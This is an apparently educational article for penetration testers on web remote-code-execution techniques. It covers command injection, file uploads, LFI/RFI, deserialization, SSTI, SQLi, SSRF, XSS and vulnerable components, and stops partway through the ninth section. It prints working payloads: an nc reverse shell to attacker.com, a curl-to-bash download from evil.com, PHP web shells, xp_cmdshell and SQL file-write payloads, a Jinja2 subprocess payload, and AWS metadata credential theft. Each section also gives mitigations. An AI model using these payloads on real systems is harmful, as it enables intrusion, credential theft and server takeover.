Sitemap

Top 10 Ways to Achieve Remote Code Execution (RCE) on Web Applications

35 min readJul 1, 2025

--

Remote Code Execution (RCE) is a severe security vulnerability that allows attackers to run arbitrary code on a target server over a network. In practice, an RCE typically means a full compromise of the application and often the hosting system, leading to data theft, service disruption, or even deployment of malware or ransomware. For penetration testers, red teamers, and bug bounty hunters, discovering an RCE is like finding gold, it’s high-impact and often comes with a big reward. This article covers the top 10 general techniques (not specific CVEs) to achieve RCE on web applications. Each section provides an explanation, a practical example (with a Python-oriented lens where appropriate), common tools/commands for exploitation, and mitigation advice. Let’s dive in!

1. OS Command Injection (Shell Injection)

Explanation: OS command injection occurs when an application takes untrusted user input and inserts it into a system command (shell command) without proper sanitization This allows an attacker to break out of the intended command context and execute arbitrary commands on the server’s operating system. In effect, the attacker “injects” additional shell instructions alongside the application’s legitimate command. Successful command injection often leads to full compromise of the application and potentially the host, since arbitrary system commands (like creating files, adding users, or installing malware) can be executed with the privileges of the web server process.

Example scenario: Consider a web app that provides a network diagnostic feature, where a user supplies an IP address and the backend runs a ping command. The vulnerable code (in Python) might look like:

import os
ip = request.GET.get('ip') # unsanitized user input
os.system(f"ping -c 1 {ip}")p

If an attacker submits 127.0.0.1; whoami, the os.system call will execute ping -c 1 127.0.0.1; whoami. The semicolon (;) ends the ping command and executes the whoami command, printing the server’s user name. In a URL, this attack could be delivered as:

http://target.app/diag?ip=127.0.0.1; whoami

This would make the server run the whoami command (or any other injected command) in addition to the ping. Attackers often use command separators like &, &&, | or ; to chain commands in this way.

Tools & Techniques: To discover command injection, testers commonly try adding special characters (; | & &&) in HTTP parameters via a proxy like Burp Suite or with curl. For example, using curl:

curl "http://target.app/search?query=test; ls -la"

If the response includes a directory listing, it’s a sign of command execution. Blind command injection (no direct output) can be detected by timing attacks (e.g., ; sleep 5) or using nslookup/curl to trigger DNS callbacks. Automated scanners (like Burp Intruder or sqlmap with --os-cmd option) can fuzz parameters with payloads. After discovering injection, tools like Netcat (for reverse shells) or custom Python scripts can be used to establish a shell. For instance, an attacker might inject nc -e /bin/sh attacker.com 4444 (on Linux) to get a reverse shell. Metasploit also provides modules for exploiting command injection once identified.

Mitigation: Developers should never directly concatenate user input into OS commands. Use high-level language functions or libraries to perform the needed action instead (e.g., use Python’s DNS libraries instead of calling the nslookup command). If calling OS commands is necessary, use safe APIs that allow parameterization (for example, use subprocess.run([...], check=True) with a list of arguments in Python, which avoids shell interpretation). Enforce strict input validation (whitelisting acceptable characters) for any input that must be part of a shell command. Implement least privilege for the application process (so that even if command injection occurs, the impact is limited). Finally, use monitoring to detect unusual system calls. Proper input sanitization and using non-shell system interfaces will prevent command injection vulnerabilities.

2. Malicious File Uploads

Explanation: Many web applications allow users to upload files (profile pictures, documents, etc.). If the file upload feature is insecure, an attacker can upload a malicious script or executable to the server and then execute it, achieving RCE. Common scenarios include uploading a web shell (e.g., a .php file on a PHP server) or an agent (like an .aspx page on ASP.NET) when the application fails to validate file type or content. The server then stores the file in a web-accessible directory, and the attacker accesses it via HTTP to execute their payload. This effectively turns the application into a dropzone for attacker-supplied code.

Example of a web shell (the popular R57 PHP shell) that an attacker could upload to a vulnerable server. Once uploaded, the attacker can issue arbitrary commands through this backdoor interface.

Example scenario: A classic example is uploading a PHP web shell. Suppose a vulnerable PHP site lets users upload images but doesn’t enforce file type checking. An attacker can upload a file named shell.php with the content:

<?php system($_GET['cmd']); ?>

If the file gets saved to, say, https://4node.ai/uploads/shell.php, the attacker can then send requests like:

http://4node.ai/uploads/shell.php?cmd=whoami

This will execute the whoami command on the server and return the outputmedium.com. Similarly, the attacker could run cmd=uname -a to get system info, or even cmd=curl http://evil.com/malware.sh | bash to download and execute a larger payload. Another example is uploading an ASP.NET shell (shell.aspx) or a Node.js reverse shell file, depending on the server technology. The key is that the server stores and executes the uploaded code.

Tools & Techniques: To exploit file upload flaws, attackers often use intercepting proxies (Burp Suite/ZAP) to modify file upload requests (e.g., change filename or MIME type). A simple approach is using cURL (lowkey pretty solid method):

curl -F "file=@shell.php" -F "submit=Upload" http://target.app/upload

The -F flag simulates a file form upload. After uploading, the attacker tries to access the file’s URL. Common tools like OWASP ZAP’s fuzzing or Burp Intruder can probe for which file extensions are allowed (e.g., try uploading .php, .jsp, .jpg with embedded PHP, etc.). Some advanced techniques include uploading polyglot files (files valid in two formats, e.g., an image that contains a PHP payload in its metadata) to bypass filtersintigriti.com. For post-exploitation, attackers often use ready-made web shells (like the R57 shell shown above, or C99 shell) or tools like Weevely (a stealth PHP web shell) to conveniently execute commands on the server. Once the shell is up, they can run OS commands, browse files, or pivot to deeper network access.

Mitigation: Secure file upload functionality is critical. Validate file types and content: enforce allowed extensions (e.g., only .png, .jpg for images) and verify file headers or magic numbers to ensure it’s genuinely an image/pdf/etc. Rename uploaded files to remove any executable suffix (e.g., always store user files with a .txt or random extension or no extension at all). Store uploads in a directory not served by the webserver or with execution permissions turned off. For example, on an Apache/PHP app, configure the upload directory with php_flag engine off so that PHP files won’t execute even if uploaded. Use libraries to sanitize filenames and reject any that contain path traversal (../) sequences. Additionally, implement virus/malware scanning on uploaded files. As a defense-in-depth, the web server should be configured to disallow script execution in upload directories. By strictly controlling what can be uploaded and never executing unvalidated content, you can prevent malicious file upload exploits.

3. Local and Remote File Inclusion (LFI/RFI)

Explanation: File inclusion vulnerabilities allow an attacker to trick the web application into including or executing unintended files. In Local File Inclusion (LFI), the application might expose the contents of files on the server’s local filesystem. In Remote File Inclusion (RFI), the application accepts a URL to a remote resource and includes it, allowing the attacker to fetch and execute code from an external site. Both LFI and RFI often arise in languages like PHP, where functions like include() or require() take a filename. If user input is concatenated into these file paths without validation, attackers can supply path traversal patterns (../../etc/passwd) or full URLs. LFI mainly leads to information disclosure (reading sensitive files), but it can be escalated to RCE if the attacker can inject code into a file that gets included. RFI is more directly dangerous as it can pull malicious code from the attacker’s server for execution, leading to immediate RCE and a “site takeover”.

Conceptual flow of a Remote File Inclusion attack. The attacker’s input points the application to a malicious script hosted on an external server, which gets included and executed on the target web server.

Example scenario: For LFI, imagine a PHP site that loads page content via a URL parameter: page.php?file=home. The code might do: include($_GET['file'] . ".php");. An attacker can manipulate the file parameter to read arbitrary files, e.g.:

http://target.app/page.php?file=../../../../etc/passwd

This would include /etc/passwd (if the ../../ traversal is not blocked), dumping the content of the server’s password file. However, LFI by itself just reads files. To achieve RCE, attackers use tricks like log poisoning or PHP wrappers. For instance, if the app logs user agent strings to a file and then includes that file, an attacker can set their User-Agent to <?php system($_GET['cmd']); ?> and then include the access log via LFI, thus executing the injected PHP code. Another LFI-to-RCE trick on PHP is including special files like /proc/self/environ which may contain attacker-controlled data (like an injected environment variable). RFI is more straightforward: if the app does include($_GET['url']); and the configuration allows remote URLs, an attacker supplies a URL to a malicious script:

http://target.app/page.php?url=http://evil.com/webshell.txt

The application will fetch and execute webshell.txt (which might contain something like <?php exec($_GET['cmd']); ?>), immediately yielding RCEimperva.com. Note: Modern PHP usually has allow_url_include disabled by default, making pure RFI less common, but many historical exploits (and some misconfigured servers) are vulnerable to it. Other languages or frameworks might have similar inclusion flaws.

Tools & Techniques: Detecting LFI involves testing parameters for path traversal. Burp Suite or OWASP ZAP can be used with fuzz lists (e.g., ../../etc/passwd, ../../../../../../etc/passwd%00 etc.) to see if sensitive file content is returned. Curl is handy for quick checks:

curl "http://target/page.php?file=../../etc/passwd"

If you see the root:x:0:0: etc., you have LFI. For RFI, an attacker might set up a netcat listener or simple HTTP server to serve a payload and detect if the target includes it. Tools like Commix or DotDotPwn can automate LFI/RFI discovery. Once an LFI is found, LFI to RCE often requires creativity: the attacker might upload a file (via another functionality) and then include it via LFI, or exploit an LFI in combination with file upload. There are also LFI exploitation tools and cheat-sheets (for example, lists of common files to attempt to include, or scripts that attempt various encoding/bypass tricks). In practice, many bug hunters will systematically try to include /etc/passwd or Windows \windows\win.ini to test LFI, and use Burp Collaborator or monitoring on their server to detect RFI inclusion attempts.

Mitigation: To prevent file inclusion vulnerabilities, never use user input directly in file include or file path functions. If you need to include dynamic content, maintain a safe mapping of allowed file names (e.g., if ?file=about then map to an internal whitelist of files). Disable remote URL includes in server settings (e.g., ensure allow_url_include is off in PHP). Normalize and validate file path inputs to eliminate .. traversal; for example, reject any input containing ../ or that resolves to a path outside the intended directory. Use chroot or containerization so the app cannot access system files even if an include is abused. In general, white-list permissible files or use indirect references (like an ID that the application maps to a file path). Also, set proper file permissions: the web app user should not have permission to read sensitive system files or write to web directories. By confining what files can be accessed, you effectively neutralize LFI/RFI vulnerabilities.

4. Insecure Deserialization

Explanation: Insecure deserialization is a vulnerability that occurs when a web application deserializes data from an untrusted source without proper validation. Serialization is converting an object into a format (binary, JSON, etc.) for storage or transmission, and deserialization is reconstructing the object from that data. If an attacker can tamper with serialized data (for example, a session token, cookie, or hidden form field) and the application later deserializes it unsafely, the attacker can craft the data to include malicious content that, during deserialization, triggers code execution. Many programming languages support advanced serialization features (like magic methods, object inheritance, etc.) that can be abused. For instance, in PHP the __wakeup or __destruct methods of objects may execute during deserialization; in Python, the __reduce__ or __reduce_ex__ method can dictate how an object is reconstructed (and can be made to execute arbitrary code); in Java and .NET, entire gadget chains (a series of object method calls) can be executed if a vulnerable class is deserialized. The result is often a remote code execution on the server in the context of the application.

Example scenario: A simple illustration in Python: suppose a web app uses pickle to serialize user session data (not a good practice, but it happens). The server expects a pickled object from the client and does pickle.loads(user_provided_data) to restore it. An attacker can create a malicious pickle that, when deserialized, executes OS commands. For example, using Python one can define a class with a __reduce__ method that returns a tuple like (os.system, ("touch /tmp/pwned",)). When this object is pickle-deserialized on the server, it will execute os.system("touch /tmp/pwned"), creating the file /tmp/pwned. In Java, a real-world example was the exploitation of Apache Commons Collections library: attackers could send a serialized object that, when deserialized, invoked a chain of methods leading to Runtime.getRuntime().exec(), thereby running a shell command on the server. Consider an application that stores user profile objects in a hidden form field as a serialized blob; an attacker could modify that blob (changing class names or values) to include a payload. When the server deserializes it, it might execute the payload and yield a shell. A notorious instance was the Java Deserialization RCE in Jenkins (CVE-2017-1000353), where sending a crafted serialized object to the Jenkins CLI endpoint resulted in arbitrary code execution on the server – without needing to log in. In PHP, an example is an app that uses unserialize() on user cookie data: by changing the cookie to include a malicious object (maybe using a known POP chain), the attacker gets RCE on unserialization.

Tools & Techniques: Insecure deserialization can be tricky to detect. Testers look for clues like serialized data structures in requests (e.g., strings like O:8:"SomeClass":... in PHP, or base64-encoded blobs that decode to serialized objects). When a suspect serialization is found, one approach is to use or modify known exploit payloads. Popular tools include ysoserial (for Java) and ysoserial.net (for .NET) which generate malicious serialized objects for various gadget chainsnumberanalytics.com. For example, using ysoserial one might generate a payload for Commons Collections that opens a calc or connects back to a shell. In Python, an attacker can create a custom pickle (as illustrated) or use libraries to create malicious YAML/JSON if the deserializer is vulnerable (e.g., Python yaml.load with untrusted input is essentially code execution). During testing, pen testers might also use Burp Suite extensions to automatically detect deserialization (some extensions attempt to insert benign objects to see if errors occur). If source code is available, they look for usage of unserialize, ObjectInputStream, pickle.loads, etc. Once a vulnerability is confirmed, exploitation often requires crafting the right object sequence. There are cheat sheets and gadget chain libraries available for this. For instance, frohoff’s ysoserial payloads for Java, or community lists of PHP gadget chains (for common CMS platforms). The exploitation process may involve trial and error with different gadgets. Tools like Java Serial Killer or marshalsec can also aid in identifying classes on the classpath that could be abused. In summary, exploiting deserialization is an advanced technique requiring specialized payloads and tools, but the payoff is direct RCE.

Mitigation: The safest way to avoid this entire class of issues is to never deserialize data from an untrusted source. If you need to persist user data, use safer formats like JSON or XML and strictly validate the content (though these too can be abused if you eval the data, so treat all input with skepticism). If binary serialization is required, implement integrity checks: for example, sign the serialized data or include an HMAC so that tampering is detectable. Many frameworks allow configuring allowed classes for deserialization — use allowlists to restrict which types can be deserialized and block the rest. For Java, libraries like SerialKiller or the built-in ObjectInputFilter in newer Java can prevent unknown classes from being deserialized. Run deserialization in a low-privilege, isolated context if possible (e.g., in a sandbox or separate process). Monitor for exceptions or anomalies during deserialization; often, exploitation attempts might throw errors that can be logged (alert on those). Keep your libraries updated, since many deserialization RCE vectors (like those in Apache Commons, Jackson, etc.) are known and patched in later versions. Finally, consider using simpler data formats: if you can switch from native serialization to a more straightforward format (and parse it safely), do so. These steps help ensure that even if an attacker modifies serialized data, they cannot leverage it for code execution.

5. Server-Side Template Injection (SSTI)

Explanation: Server-Side Template Injection occurs when user input is unsafely embedded into a server-side template, leading to arbitrary code execution on the server. Modern web applications often use template engines (like Jinja2 in Python, Twig in PHP, Freemarker or Thymeleaf in Java, Razor in .NET, etc.) to render dynamic HTML. If the template engine is used improperly — for example, directly including user-supplied strings in the template without filtering — an attacker can inject template directives. Template engines are essentially code interpreters, so an injection can allow execution of server-side code (often in the template’s host language). SSTI vulnerabilities often result in full RCE because template engines usually have capabilities to call functions, access files, or execute shell commands. The classic example is from the research “Server-Side Template Injection: RCE for the modern web app” which introduced this attack vector.

https://portswigger.net/web-security/server-side-template-injection

Example scenario: Consider a Python Flask application using Jinja2 for templating. Suppose it has code like:

from flask import request, render_template_string
@app.route('/hello')
def hello():
name = request.args.get('name', '')
template = f"Hello {name}"
return render_template_string(template)

This looks innocent, but if an attacker passes name={{7*7}}, the template becomes Hello {{7*7}}. Jinja2 will evaluate {{7*7}} and output Hello 49. This confirms injection. That alone is just math, but attackers can escalate: Jinja2 (and many engines) allow accessing internals of the language. A notorious Jinja2 payload for RCE is:

{{''.__class__.mro()[1].__subclasses__()[CLASS]('uname -a', shell=True, stdout=-1).communicate()}}

This payload is leveraging Jinja2’s ability to navigate Python’s object model. Here, ''.__class__.mro()[1].__subclasses__() finds all classes, and by picking the right index for the subprocess.Popen class (denoted by CLASS index), it calls it to execute a shell command (uname -a in this case). The output would be captured and inserted into the template response. In practice, an attacker would trial class indices or use shorter payloads if possible. Different template engines have different syntax: e.g., in Ruby ERB, <%= \ls` %>could executels; in Twig (PHP), one could use {{ system('id') }}if sandbox is disabled; in .NET Razor, injection is less trivial but potentially possible via C# code. Essentially, if you see your input reflected in a template evaluation context (especially inside{{ }}` or similar), you might have SSTI, which can often be escalated to run code on the server.

Tools & Techniques: To find SSTI, testers will inject template expressions specific to various engines and look for either execution or errors. For example, they might try payloads like {{7*7}}, ${{7*7}}, <%=7*7%> in user inputs and see if the output is 49 or if an error message hints at a template engine. Using curl for quick testing (as shown above with the Flask example) or Burp to automate multiple payloads is common. There’s a useful Burp extension called Backslash Powered Scanner which injects a wide range of SSTI probes and analyzes responses. Another tool is Tplmap, which automates exploitation of SSTI once discovered. It can identify the template engine and often drop into an interactive shell or run commands through the template. Once the engine is identified (Jinja2, Freemarker, etc.), attackers tailor their payloads to that engine’s features. They might use publicly known gadgets; for instance, Jinja2 has the cycler or joiner technique as alternatives to the one shown, and Java’s Freemarker can call freemarker.template.utility.Execute to run commands. IDE debugging or REPL can also help craft payloads: an attacker might replicate the template environment locally (install the same template engine) and experiment with inputs to achieve code execution. In summary, finding SSTI is about injecting likely template syntax and observing behavior, and exploiting it is about invoking the engine’s functions or underlying language to run OS commands.

Mitigation: The primary defense against SSTI is not to mix untrusted input with templates in an unsafe way. Treat templates like code (because they are) — never directly inject user-provided strings into templates. Use the templating engine’s built-in escaping or filtering functions. For example, Jinja2 has auto-escaping (especially if used with Flask properly), and you should avoid using render_template_string on raw input as in the example. If dynamic template rendering is needed, consider a safe subset or sandbox for user content. Some template engines offer sandbox modes (e.g., Jinja2 sandbox), but be cautious, sandboxes have had escapes before. Validate and sanitize any user inputs that might go into templates: if the input is just a name to greet, ensure it’s plain text (no braces or code). Use allowlists for expected content or patterns. Additionally, keep template engines updated, as some have patched certain risky functionality. Essentially, treat user-supplied template data as potentially malicious code – because SSTI shows it can become exactly that. By separating data and logic in templates and avoiding unsafe APIs, you can prevent SSTI. Web application firewalls (WAFs) may catch some SSTI patterns (e.g., {{ sequences), but do not rely solely on that – fixing the code is the surest mitigation.

6. SQL Injection Leading to RCE

Explanation: SQL Injection (SQLi) is a well-known vulnerability where an attacker can manipulate a backend SQL query by injecting malicious SQL segments. While SQLi typically allows extraction or modification of data, certain databases offer ways to execute system commands, effectively turning a SQLi into an RCE. In other words, if an attacker can run SQL on the server, under some circumstances they can escalate that to running OS commands. This depends on the database and its configuration. For example, Microsoft SQL Server has the stored procedure xp_cmdshell which (if enabled and the user has sufficient privileges) allows execution of operating system commands. Other databases have similar features: Oracle has external procedure calls, PostgreSQL has user-defined functions or can call out to the underlying OS with extensions like COPY ... TO PROGRAM, and MySQL/MariaDB can be tricked (with FILE privileges) into writing files to the filesystem (which could be a webshell in the web directory). SQLi to RCE is basically using the database as a stepping stone to get code execution in the host environment.

Example scenario: Imagine an application with a typical SQLi: http://target.app/products?category=electronics' OR 1=1--. This dumps all products due to SQL injection. Now, the database is Microsoft SQL Server. The attacker, through the injectable parameter, can try:

'; EXEC xp_cmdshell 'whoami';--

This payload closes the current query and executes xp_cmdshell 'whoami', which if allowed, will run the whoami command on the database server’s OS. The result (the user account under which SQL Server is running) might be returned as part of the query results. From there, the attacker can run arbitrary commands (xp_cmdshell 'powershell -c ...' etc.). Another example: on MySQL, an attacker could use injection to write a malicious file. For instance, UNION SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/shell.php' (provided the database user has file write permissions). This drops a PHP shell on the server, which the attacker can then access via the web. PostgreSQL, if the user can create functions, might allow creating a function in C that spawns a shell – though that’s complex. There’s also the case of MySQL’s sys_exec() UDF or Microsoft’s Ole Automation procedures for spawning processes. The key scenario for SQLi-to-RCE is when the database has some stored procedure or feature to interact with the OS and the attacker can invoke it via SQL injection.

Tools & Techniques: Standard SQL injection tools like sqlmap can automate this process. In fact, sqlmap has options such as --os-shell and --os-pwn that attempt to leverage database features to drop a shell. For example, if sqlmap detects a MSSQL injection, it will try enabling xp_cmdshell if it’s disabled and then use it to open a remote shell for the attacker. Even without sqlmap, an attacker can use manual SQL clients or browser-based exploitation for simpler payloads. Using Burp Suite or curl to test SQL payloads (like adding '; EXEC xp_cmdshell 'ping attacker.com'--) can confirm if commands execute (for instance, by pinging back to an attacker-controlled host). For MySQL file writes, an attacker might not see output, but by checking if the file got created (maybe via LFI or direct web access) they confirm success. Attackers also use out-of-band channels: e.g., with MSSQL they might use xp_cmdshell to run powershell or bitsadmin to fetch a reverse shell binary from the internet and execute it, establishing a connection back. A variety of tools, including Metasploit, have modules for specific SQLi-to-RCE exploits (like Oracle Java procedure exploit, or MSSQL payloads). In summary, once SQL injection is found, the techniques to get RCE involve calling platform-specific functions. Knowledge of the target DBMS is crucial – for example, knowing that on Microsoft SQL you can try xp_cmdshell, on Oracle UTL_HTTP.request or external tables, etc. Often the attacker will first use SQLi to figure out database version and user privileges, then choose the method accordingly.

Mitigation: Preventing SQL injection is a fundamental part of secure development. Always use parameterized queries (prepared statements) for database operations, this ensures user input is treated as data, not executable SQL. By eliminating direct string concatenation of SQL commands, you close the door on injection entirely. Use ORMs or query builders that properly escape or parameterize inputs. Principle of least privilege: the database account used by the application should have the minimum rights it needs (for example, it probably does not need permission to execute system stored procedures like xp_cmdshell or write to arbitrary files). Disabling dangerous features: if using MSSQL, disable xp_cmdshell unless absolutely neededintigriti.com. On databases, consider revoking execute rights on sys procedures from web-user roles. Use web application firewalls or database firewalls to detect and block common SQL injection patterns (though not foolproof, they add a layer). Additionally, input validation and output encoding can help (for instance, validating that an expected numeric ID contains only digits). Regularly update and patch the DBMS, as some SQLi-to-RCE vectors rely on known issues or defaults. And of course, employ SAST/DAST tools to catch SQL injection in development and testing. The bottom line: preventing SQL injection in the first place prevents this RCE path entirely. Secure coding practices and least-privilege configurations are the cure.

7. Server-Side Request Forgery (SSRF) leading to RCE

Explanation: SSRF is a vulnerability where an attacker can make a target server perform HTTP requests to an arbitrary URL of the attacker’s choosing. Typically, SSRF is used to access internal services (since the web server might have access to internal network or cloud metadata that the attacker cannot directly reach). By itself, SSRF allows reading/writing data from the server’s perspective. However, certain SSRF scenarios can be escalated to remote code execution. This escalation usually happens in one of two ways: (1) the attacker finds an internal service that is vulnerable or by design allows code execution (for example, an internal API that runs commands, a misconfigured management interface, etc.), and SSRF is the gateway to reach it; or (2) SSRF is used to access cloud infrastructure metadata (like AWS/GCP/Azure instance metadata) or other sensitive endpoints to retrieve credentials or secrets, which the attacker then leverages to gain code execution elsewhere.

Example scenario (Internal service leverage): Suppose the target application is running in a cloud environment and has SSRF in a feature that fetches URLs (e.g., a PDF generation service that fetches HTML from a URL). The attacker uses SSRF to reach http://localhost:8080/admin – an internal admin panel not normally exposed. If that admin service has an API endpoint like http://localhost:8080/run?cmd= (for example, a development interface), the attacker can trigger it. Concretely, an attacker could send: http://main.app/report?url=http://localhost:8080/run?cmd=id. If the internal service executes the id command, its output might come back in the response. Even more powerfully, consider an internal Jenkins or Solr instance: SSRF to http://localhost:8080/jenkins/script could allow running Groovy scripts (RCE), or SSRF to a vulnerable Redis or MongoDB instance could sometimes be escalated. Another rising example is SSRF to headless browsers or PDF converters: these services might interpret HTML/JS. As mentioned in one case, if an SSRF can force an internal browser to load attacker-controlled HTML, the attacker could exploit a sandbox escape in the browser, leading to RCE on the server.

Example scenario (Exposing cloud credentials): The classic case is AWS EC2 instance metadata. If the application is running on AWS, a well-known SSRF target is http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME. By hitting this internal IP (which every AWS instance has for metadata), the attacker can grab temporary AWS credentials for the instance’s IAM role. These credentials might allow access to various AWS services. In the worst case (if the IAM role is high-privileged), the attacker can use them to spin up their own AWS instances, read S3 buckets, or even execute commands on the server via AWS APIs (for example, AWS Systems Manager’s RunCommand, or attaching a malicious policy to the instance). In simpler terms, with the credentials, an attacker can often remotely administer the cloud instances, effectively achieving RCE or broader account takeover. Another cloud example: Google Cloud’s metadata or Azure’s metadata, which similarly can leak tokens. Beyond cloud, sometimes SSRF can reach internal networks where there might be an API like http://internal-api/update?url=http://evil.com/payload that downloads and runs code, etc. The possibilities depend on what the internal network hosts; SSRF is the foot in the door.

Tools & Techniques: To find SSRF, testers usually try providing internal addresses as input where an external URL is expected. Using curl is straightforward:

curl "http://target.app/fetch?url=http://127.0.0.1:80/"

and see if the response contains something (like an internal service banner). They may also try common internal IPs (AWS: 169.254.169.254; Docker/K8s: 127.0.0.1 with common ports; or other RFC1918 IPs like 10.x.x.x). Burp Suite can automate this via payloads and detect responses. There are specialized tools like SSRFmap which take a URL parameter and scan for common internal services. Once an interesting internal endpoint is found, the attacker switches to exploration/exploitation mode: for example, if it’s AWS metadata, they will request the credentials and then use AWS CLI or Boto3 (Python) scripts with those credentials to see what they can do (list EC2 instances, maybe spawn a new instance with user-data that runs a script, etc.). If it’s an internal API, they might use a combination of SSRF and proxy tools to interact with it (for example, connecting the SSRF parameter to a Burp Collaborator server to proxy requests). Another technique is blind SSRF detection using out-of-band interaction: e.g., provide http://attacker-server.com as the URL and see if the attacker’s server gets a request (which means the app fetched it). In terms of turning SSRF to RCE, the tools are the same as normal RCE once you have the foothold: if you retrieved credentials, you might use aws CLI or gcloud CLI; if you accessed a management API, you use its documented methods or any exploit scripts available. Keep in mind that SSRF exploitation is highly context-specific – you might need to chain multiple steps. For cloud creds, attackers commonly use those keys to either connect to an API that can run code (like AWS Lambda, AWS SSM, etc.) or even to SSH into the very instance (some IAM roles allow retrieving their own key pairs or adding SSH keys).

Mitigation: Preventing SSRF involves both application-level and network-level measures. At the application layer, validate and sanitize any URLs that the application fetches. Avoid allowing arbitrary URLs; implement an allowlist of safe domains that the server truly needs to fetch. For example, if it should only fetch from your company’s API, enforce the domain. Disallow private IP ranges and common metadata IPs in user-supplied URLs (some frameworks or libraries can do SSRF validation). Also, if possible, the fetch function should itself be restricted (for instance, using a proxy that blocks internal addresses). At the network layer, leverage firewall rules: the web server likely doesn’t need to initiate connections to the internal network or to the cloud metadata service — block outbound requests to sensitive internal addresses. For AWS, use IMDSv2 (Instance Metadata Service v2), which requires a token and mitigates simple SSRF access to metadata. In containerized environments, avoid exposing admin ports to the same network as the app if not needed. Essentially, segmentation and egress control can stop an SSRF from reaching juicy targets. Also, monitor outbound traffic from servers — an unexpected call to the metadata IP or internal services could indicate an SSRF attack. By combining strict input rules (only allow URLs to known-good hosts) and network restrictions (no outbound calls to internal-only resources), you greatly reduce SSRF risk.

8. Cross-Site Scripting (XSS) as a Path to RCE

Explanation: Cross-Site Scripting is usually a client-side issue (running malicious JavaScript in a victim’s browser). However, in certain scenarios, an attacker can leverage XSS to ultimately achieve code execution on the server. This typically requires a privileged victim, such as an administrator, and an application feature that allows that admin to perform actions leading to RCE. In essence, the attacker uses XSS as a form of remote control of an admin’s browser, which is authenticated to the application, to perform actions that the attacker otherwise couldn’t. For instance, on some platforms (like CMS or cloud management interfaces), an admin can install plugins, modify templates, or access server consoles via the web interface. If the attacker can run JavaScript in the admin’s browser (via XSS), they can automate those admin actions to deploy a webshell or create a new admin account. It’s a less direct method than others, and often requires social engineering (tricking an admin to visit a malicious link or page), but it expands a simple XSS into a full system compromise.

Example scenario: A real-world example is WordPress XSS leading to RCE. WordPress admins can install plugins or edit theme PHP code in the dashboard. Suppose there’s a stored XSS in the comments section of a blog (an attacker posts a comment containing <script>...malicious JS...</script>). When an admin user later views the comments moderation page, the XSS triggers in their browser. The malicious script could, for instance, silently send an HTTP request (using the admin’s cookies) to create a new plugin or edit a theme file to include <?php system($_GET['cmd']); ?>. Concretely, the JS could do:

fetch("/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty", {
method: "POST",
body: "new_content=<?php system($_GET['cmd']); ?>&submit=Save"
});

This is an oversimplification, but the idea is the XSS uses the WordPress admin interface to write a PHP webshell into a theme file. Next, the attacker can directly access that shell on the server. Another scenario: an application’s admin panel might have a feature to run backup or diagnostics (maybe an admin can input a command to execute on server via a web form). If XSS can simulate an admin filling and submitting that form, it can trigger RCE. Essentially any functionality only available to admins — if reachable via HTTP requests — can potentially be driven by XSS. The Intigriti article cited an example where XSS on an admin panel was used to create a new admin account and then the attacker used that account to upload a web shell.

Tools & Techniques: Achieving RCE via XSS is more situational. First, the attacker needs to find an XSS (using typical techniques: payloads like <script>alert(1)</script> and variations, tested via Burp, etc.). Once a potent XSS is found, the next step is reconnaissance of the admin functionalities. Tools like Burp Proxy and Browser DevTools are useful – the attacker might need to observe what requests are made when an admin performs certain actions (e.g., uploading a plugin, creating a user, etc.). Then they craft JavaScript to replicate those requests. This often involves extracting some CSRF tokens or nonce values from the page – so the XSS payload might first do a GET request to fetch a page, parse out a token, then perform the privileged action with that token. This can all be done in JavaScript. Testing such a payload might be done in a controlled environment (the attacker might use their own admin account on a test instance, for example, to perfect the exploit script). Frameworks like the BeEF (Browser Exploitation Framework) can also control a hooked browser; an XSS can load the BeEF hook, and then the attacker can use BeEF’s modules to drive the admin session to do things like send requests or keystrokes. Ultimately, the “tool” here is the malicious JavaScript itself. It’s often custom, but likely small in size to fit in an XSS vector. One might also use a phishing approach – sending the admin a link to a crafted URL that triggers the XSS (if it’s reflected) – but that crosses into social engineering. Many bug bounty programs consider exploitation via admin XSS as valid if no user interaction beyond viewing is needed (though sometimes they consider it out of scope if it requires convincing an admin). Regardless, for the attacker, the key is carefully constructing the exploit and possibly using the browser’s developer console to test in real time if they have any access.

Mitigation: Mitigating this chained attack means mitigating XSS in the first place and also following the principle of least privilege in web admin interfaces. To prevent XSS, ensure all user inputs that are reflected in pages are properly encoded, use frameworks that auto-escape by default, and consider Content Security Policy (CSP) to make exploitation harder. For the scenario where XSS could perform powerful actions: ensure critical admin actions have additional controls. For example, creating new admins or editing template code might require re-authentication or high-entropy CSRF tokens that are hard to grab via XSS. Implement CSP such that even if XSS fires, it might not be able to load external scripts or send out requests (CSP can restrict fetch/XHR destinations). Also, segregate duties: maybe the account that moderates comments shouldn’t be the same super-admin that can edit code. In general, defense in depth: fix the XSS, but also assume an XSS could happen and shield sensitive actions (multi-factor confirmations, etc.). Additionally, HttpOnly cookies for session tokens can prevent XSS from directly stealing sessions, but in these cases the script is just making requests, not stealing cookies, so HttpOnly doesn’t stop the abuse. Therefore, focus on content sanitization and robust CSRF protection. From a broader view, training admins not to click suspicious links and using subresource integrity for any loaded scripts can also help, but the root fix is to eliminate XSS vulnerabilities and guard high-impact features.

9. Exploiting Vulnerable Components (Third-Party Libraries and Services)

Explanation: Modern web applications rely on a multitude of third-party components, frameworks, libraries, modules, and external services. A remote code execution can often be achieved by exploiting a known vulnerability in one of these components, rather than a mistake in the custom application code. This isn’t a “vulnerability class” like the others, but rather a method: find out what software the target is using, and see if any known RCE vulnerabilities exist for those versions. If the target hasn’t patched or updated a critical component, an attacker can leverage public exploits (or adapt proof-of-concepts) to execute code. Examples of this include vulnerabilities like Log4Shell (CVE-2021–44228) in Log4j, where a simple string in an HTTP header could trigger a JNDI lookup and execute code on any vulnerable server. Another is the Apache Struts RCE (that led to the Equifax breach) just sending a crafted Content-Type header exploited a weakness in the Struts framework. Essentially, this method abuses the fact that many organizations run outdated software with known holes.

